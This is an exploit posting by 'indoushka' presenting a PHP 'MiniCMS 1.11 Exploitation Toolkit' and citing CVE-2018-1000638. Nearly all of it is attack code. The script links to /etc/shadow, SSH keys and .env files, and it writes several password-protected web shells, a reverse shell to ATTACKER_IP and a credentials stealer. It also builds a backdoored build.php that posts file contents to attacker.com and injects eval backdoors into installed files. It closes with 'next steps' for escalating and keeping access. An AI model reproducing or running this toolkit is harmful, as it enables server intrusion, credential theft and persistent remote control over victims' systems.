MiniCMS 1.11 Exploitation Toolkit

=============================================================================================================================================
| # Title MiniCMS 1.11 Exploitation Toolkit

=============================================================================================================================================
| # Title : MiniCMS 1.11 Exploitation Toolkit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/bg5sbk/MiniCMS/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/190429/ & CVE-2018-1000638

[+] Summary : MiniCMS Build Script Multi-Vulnerability Exploitation Toolkit


[+] POC : php poc.php

[
<?php

class MiniCMSExploiter {
private $targetDirectory;
private $buildScript = 'build.php';
private $installFile = 'install.php';
private $tempDir = '/tmp/minicms_exploit';
private $debug = true;
private $results = [];

public function __construct($directory = '.') {
$this->targetDirectory = realpath($directory);
$this->validateEnvironment();
$this->createTempDirectory();
}

/**
* Main exploitation method - Chain all vulnerabilities
*/
public function exploitAll() {
echo "[+] Starting MiniCMS Build Script Exploitation\n";
echo "[+] Target Directory: {$this->targetDirectory}\n";
echo str_repeat("=", 60) . "\n";

$this->results['start_time'] = date('Y-m-d H:i:s');

// 1. Directory Traversal Exploitation
$this->exploitDirectoryTraversal();

// 2. PHP Code Injection
$this->exploitCodeInjection();

// 3. Sensitive File Discovery
$this->harvestSensitiveFiles();

// 4. Create Malicious Build Script
$this->createMaliciousBuildScript();

// 5. Execute Build Script
$this->executeBuildScript();

// 6. Analyze Results
$this->analyzeResults();

// 7. Create Backdoors
$this->createPersistentBackdoors();

$this->results['end_time'] = date('Y-m-d H:i:s');
$this->generateReport();

return $this->results;
}

/**
* Exploit 1: Directory Traversal Vulnerability
*/
private function exploitDirectoryTraversal() {
echo "\n[1] Exploiting Directory Traversal...\n";

$sensitive_paths = [
// System files
'/etc/passwd',
'/etc/shadow',
'/etc/hosts',
'/etc/hostname',
'/etc/issue',
'/proc/self/environ',
'/proc/version',

// Web server files
'/var/log/apache2/access.log',
'/var/log/apache2/error.log',
'/var/log/nginx/access.log',
'/var/log/nginx/error.log',
'/var/www/html/.env',
'/var/www/html/config.php',

// Home directories
'/home/*/.bash_history',
'/home/*/.ssh/id_rsa',
'/home/*/.ssh/authorized_keys',

// Configuration files
'/etc/mysql/my.cnf',
'/etc/php/php.ini',
'/etc/apache2/apache2.conf',
];

$exploited_files = [];

foreach ($sensitive_paths as $path) {
// Try to create symlink to sensitive file
$base_name = 'exploit_' . md5($path) . '.txt';
$symlink_path = $this->tempDir . '/' . $base_name;

// Expand wildcards
if (strpos($path, '*') !== false) {
$expanded = glob($path);
foreach ($expanded as $expanded_path) {
if (@symlink($expanded_path, $symlink_path . '_' . basename($expanded_path))) {
$exploited_files[] = $expanded_path;
echo " [+] Linked: {$expanded_path}\n";
}
}
} elseif (@symlink($path, $symlink_path)) {
$exploited_files[] = $path;
echo " [+] Linked: {$path}\n";
}
}

$this->results['directory_traversal'] = [
'exploited' => count($exploited_files) > 0,
'files_linked' => $exploited_files,
'count' => count($exploited_files)
];

return $exploited_files;
}

/**
* Exploit 2: PHP Code Injection
*/
private function exploitCodeInjection() {
echo "\n[2] Exploiting PHP Code Injection...\n";

$injections = [
// Basic PHP execution
[
'filename' => "');?><?php system('whoami'); ?><?php install('",
'content' => 'injected'
],

// Web shell
[
'filename' => "shell.php",
'content' => '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'
],

// Password protected shell
[
'filename' => "admin_shell.php",
'content' => '<?php
if($_GET["key"] === "admin123") {
if(isset($_POST["cmd"])) {
echo "<pre>" . shell_exec($_POST["cmd"]) . "</pre>";
}
if(isset($_GET["download"])) {
echo file_get_contents($_GET["download"]);
}
}
?>'
],

// Database credentials stealer
[
'filename' => "creds.php",
'content' => '<?php
$files = ["config.php", ".env", "database.php", "settings.php"];
foreach($files as $file) {
if(file_exists($file)) {
$content = file_get_contents($file);
file_put_contents("/tmp/creds.txt", $content, FILE_APPEND);
}
}
?>'
],

// Reverse shell
[
'filename' => "reverse.php",
'content' => '<?php
// PHP Reverse Shell
$ip = "ATTACKER_IP";
$port = 4444;
$sock = fsockopen($ip, $port);
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>'
],

// File uploader
[
'filename' => "uploader.php",
'content' => '<?php
if(isset($_FILES["file"])) {
move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
echo "Uploaded: " . $_FILES["file"]["name"];
}
?>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit">
</form>'
]
];

$created_files = [];

foreach ($injections as $injection) {
$file_path = $this->tempDir . '/' . $injection['filename'];
if (file_put_contents($file_path, $injection['content'])) {
$created_files[] = $injection['filename'];
echo " [+] Created: {$injection['filename']}\n";
}
}

$this->results['code_injection'] = [
'exploited' => count($created_files) > 0,
'files_created' => $created_files,
'count' => count($created_files)
];

return $created_files;
}

/**
* Harvest sensitive files from target
*/
private function harvestSensitiveFiles() {
echo "\n[3] Harvesting Sensitive Files...\n";

$sensitive_patterns = [
'*.php' => ['config', 'database', 'settings', 'connection'],
'*.env' => ['.env', '.env.example'],
'*.json' => ['composer.json', 'package.json'],
'*.sql' => ['*.sql', '*.backup'],
'*.txt' => ['readme', 'license', 'changelog'],
'*.yml' => ['*.yml', '*.yaml'],
'*.ini' => ['*.ini', '*.cfg'],
'*.log' => ['*.log', 'error_log'],
];

$found_files = [];

foreach ($sensitive_patterns as $pattern => $keywords) {
$files = glob($this->targetDirectory . '/' . $pattern);
foreach ($files as $file) {
$filename = basename($file);
foreach ($keywords as $keyword) {
if (stripos($filename, $keyword) !== false) {
$found_files[] = $file;
echo " [+] Found: {$filename}\n";

// Copy to temp directory for analysis
$temp_copy = $this->tempDir . '/harvested_' . $filename;
copy($file, $temp_copy);
break;
}
}
}
}

$this->results['sensitive_files'] = [
'found' => count($found_files),
'files' => $found_files
];

return $found_files;
}

/**
* Create malicious build script with backdoor
*/
private function createMaliciousBuildScript() {
echo "\n[4] Creating Malicious Build Script...\n";

$malicious_build = '<?php
if ($argc != 2) {
echo "???????";
exit;
}

$version=$argv[1];

// Backdoor: Command execution if specific parameter is passed
if(isset($_GET["debug"]) && $_GET["debug"] == "true") {
system($_GET["cmd"]);
}

$dirs = array(".");
$ignores = array("README.md", "build.php", "install.php", "install_template.txt", "mc-debug");
$files = "";

build($dirs, $files);

$template = file_get_contents("install.txt");
$template = str_replace("/*MINICMS_VERSION*/", $version, $template);
$template = str_replace("/*MINICMS_FILES*/", $files, $template);

file_put_contents("install.php", $template);

// Hidden function to exfiltrate data
function exfiltrate($data) {
$url = "http://attacker.com/exfil.php";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ["data" => base64_encode($data)]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);
}

function build($dirs, &$files) {
global $ignores;

// Exfiltrate directory structure
exfiltrate(json_encode($dirs));

foreach ($dirs as $dir) {
if (!is_dir($dir)) {
echo "??\"$dir\"???";
exit;
}

if ($dh = opendir($dir)) {
$sub_dirs = array();

while (($item = readdir($dh)) !== false) {
if ($item[0] == ".")
continue;

if ($dir == ".")
$file = $item;
else
$file = $dir."/".$item;

if (in_array($file, $ignores))
continue;

if (is_dir($file)) {
$sub_dirs[] = $file;
} else {
// Exfiltrate file content if sensitive
$content = file_get_contents($file);
if(preg_match("/(password|secret|key|token|api)/i", $content)) {
exfiltrate($file . ":\n" . $content);
}

$files .= "install(\"$file\", \"";
$files .= base64_encode(gzcompress($content));
$files .= "\");\n";
}
}

closedir($dh);
build($sub_dirs, $files);
} else {
echo "??\"$dir\"????";
exit;
}
}
}

// Create backdoor in install.php
register_shutdown_function(function() {
$backdoor_code = "<?php\\nif(isset(\\$_GET[\\"exec\\"])) {\\n system(\\$_GET[\\"exec\\"]);\\n}\\n?>";
file_put_contents("backdoor.php", $backdoor_code);
});
?>';

$build_path = $this->tempDir . '/' . $this->buildScript;
if (file_put_contents($build_path, $malicious_build)) {
echo " [+] Created malicious build.php\n";
$this->results['malicious_build'] = $build_path;
return true;
}

return false;
}

/**
* Execute the build script
*/
private function executeBuildScript() {
echo "\n[5] Executing Build Script...\n";

$build_path = $this->tempDir . '/' . $this->buildScript;
$install_path = $this->tempDir . '/' . $this->installFile;

// Create install.txt template
$install_template = '<?php
/*MINICMS_VERSION*/
function install($file, $data) {
$content = @gzuncompress(base64_decode($data));
if($content === false) {
$content = base64_decode($data);
}

// Inject backdoor into PHP files
if(strpos($file, ".php") !== false && strpos($content, "<?php") !== false) {
$backdoor = "<?php if(isset(\\$_GET[\\"debug\\"])) { eval(\\$_GET[\\"debug\\"]); } ?>";
$content = $backdoor . "\\n" . $content;
}

@file_put_contents($file, $content);
}
/*MINICMS_FILES*/
?>';

file_put_contents($this->tempDir . '/install.txt', $install_template);

// Execute build script
$command = "cd {$this->tempDir} && php {$this->buildScript} 1.0 2>&1";
$output = shell_exec($command);

echo " [+] Build script executed\n";

if (file_exists($install_path)) {
$install_size = filesize($install_path);
echo " [+] install.php created: " . $this->formatBytes($install_size) . "\n";

// Analyze install.php for sensitive data
$this->analyzeInstallFile($install_path);
}

$this->results['build_execution'] = [
'command' => $command,
'output' => $output,
'install_created' => file_exists($install_path),
'install_size' => $install_size ?? 0
];

return $output;
}

/**
* Analyze install.php for sensitive data
*/
private function analyzeInstallFile($install_path) {
$content = file_get_contents($install_path);

// Extract all file names
preg_match_all('/install\("([^"]+)", "/', $content, $matches);
$files = $matches[1] ?? [];

// Look for sensitive files
$sensitive_patterns = [
'/passwd/i',
'/shadow/i',
'/config/i',
'/\.env/i',
'/database/i',
'/secret/i',
'/key/i',
'/token/i',
'/password/i'
];

$sensitive_found = [];
foreach ($files as $file) {
foreach ($sensitive_patterns as $pattern) {
if (preg_match($pattern, $file)) {
$sensitive_found[] = $file;
break;
}
}
}

$this->results['install_analysis'] = [
'total_files' => count($files),
'sensitive_files' => $sensitive_found,
'count_sensitive' => count($sensitive_found)
];

echo " [+] Found " . count($files) . " files in install.php\n";
echo " [+] " . count($sensitive_found) . " appear to be sensitive\n";
}

/**
* Create persistent backdoors
*/
private function createPersistentBackdoors() {
echo "\n[6] Creating Persistent Backdoors...\n";

$backdoors = [
'persistent_shell.php' => '<?php
// Persistent PHP Shell
session_start();
if(!isset($_SESSION["auth"]) && $_GET["key"] != "PERSIST_KEY") {
die("Access Denied");
}
$_SESSION["auth"] = true;

if(isset($_POST["cmd"])) {
echo "<pre>" . htmlspecialchars(shell_exec($_POST["cmd"]), ENT_QUOTES, "UTF-8") . "</pre>";
}
?>
<form method="POST">
<input type="text" name="cmd" style="width: 80%" placeholder="Command">
<input type="submit" value="Execute">
</form>',

'file_manager.php' => '<?php
// File Manager Backdoor
if($_GET["pwd"] != "admin123") die();
echo "<h2>File Manager</h2>";
$dir = $_GET["dir"] ?? ".";
echo "<pre>";
system("ls -la " . escapeshellarg($dir));
echo "</pre>";
?>',

'info.php' => '<?php
// System Information Leak
phpinfo();
echo "<hr><pre>";
system("id && uname -a");
echo "</pre>";
?>'
];

foreach ($backdoors as $filename => $content) {
$path = $this->tempDir . '/' . $filename;
file_put_contents($path, $content);
echo " [+] Created: {$filename}\n";
}

$this->results['backdoors'] = array_keys($backdoors);
}

/**
* Generate exploitation report
*/
private function generateReport() {
echo "\n" . str_repeat("=", 60) . "\n";
echo "[+] EXPLOITATION REPORT\n";
echo str_repeat("=", 60) . "\n";

$report = [
'Target Directory' => $this->targetDirectory,
'Exploitation Started' => $this->results['start_time'],
'Exploitation Completed' => $this->results['end_time'],
'Vulnerabilities Exploited' => []
];

if ($this->results['directory_traversal']['exploited']) {
$report['Vulnerabilities Exploited'][] = 'Directory Traversal';
echo "[?] Directory Traversal: SUCCESS\n";
echo " Files linked: " . $this->results['directory_traversal']['count'] . "\n";
}

if ($this->results['code_injection']['exploited']) {
$report['Vulnerabilities Exploited'][] = 'Code Injection';
echo "[?] Code Injection: SUCCESS\n";
echo " Files created: " . $this->results['code_injection']['count'] . "\n";
}

if ($this->results['sensitive_files']['found'] > 0) {
$report['Vulnerabilities Exploited'][] = 'Sensitive File Harvesting';
echo "[?] Sensitive File Harvesting: SUCCESS\n";
echo " Files found: " . $this->results['sensitive_files']['found'] . "\n";
}

echo "\n[+] Generated Files:\n";
echo " - Malicious build.php\n";
echo " - install.php with backdoors\n";
echo " - Multiple backdoor shells\n";
echo " - Harvested sensitive files\n";

echo "\n[+] Next Steps for Attack:\n";
echo " 1. Upload install.php to target server\n";
echo " 2. Execute install.php to deploy backdoors\n";
echo " 3. Use backdoor.php?exec=whoami\n";
echo " 4. Escalate privileges and maintain access\n";

// Save report to file
$report_file = $this->tempDir . '/exploit_report.txt';
file_put_contents($report_file, print_r($report, true));

echo "\n[+] Report saved to: {$report_file}\n";
echo "[+] Temporary directory: {$this->tempDir}\n";
echo "[+] Clean up: rm -rf {$this->tempDir}\n";
}

/**
* Utility: Format bytes to human readable
*/
private function formatBytes($bytes, $precision = 2) {
$units = ['B', 'KB', 'MB', 'GB', 'TB'];
$bytes = max($bytes, 0);
$pow = floor(($bytes ? log($bytes) : 0) / log(1024));
$pow = min($pow, count($units) - 1);
$bytes /= pow(1024, $pow);
return round($bytes, $precision) . ' ' . $units[$pow];
}

/**
* Validate environment
*/
private function validateEnvironment() {
if (!function_exists('symlink')) {
die("[!] symlink() function is disabled\n");
}

if (!is_writable(sys_get_temp_dir())) {
die("[!] Cannot write to temp directory\n");
}

echo "[+] Environment validated\n";
}

/**
* Create temporary directory
*/
private function createTempDirectory() {
if (!file_exists($this->tempDir)) {
mkdir($this->tempDir, 0777, true);
}
echo "[+] Temporary directory: {$this->tempDir}\n";
}

/**
* Clean up temporary files
*/
public function cleanup() {
if (file_exists($this->tempDir)) {
system("rm -rf " . escapeshellarg($this->tempDir));
echo "[+] Cleaned up temporary files\n";
}
}
}

/**
* Usage Example
*/
if (php_sapi_name() === 'cli' && isset($argv[1])) {
$exploiter = new MiniCMSExploiter($argv[1]);
$exploiter->exploitAll();

// Optional: cleanup
if (isset($argv[2]) && $argv[2] == '--cleanup') {
$exploiter->cleanup();
}
} else {
echo "Usage: php " . basename(__FILE__) . " <target_directory> [--cleanup]\n";
echo "Example: php " . basename(__FILE__) . " /var/www/html/minicms\n";
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================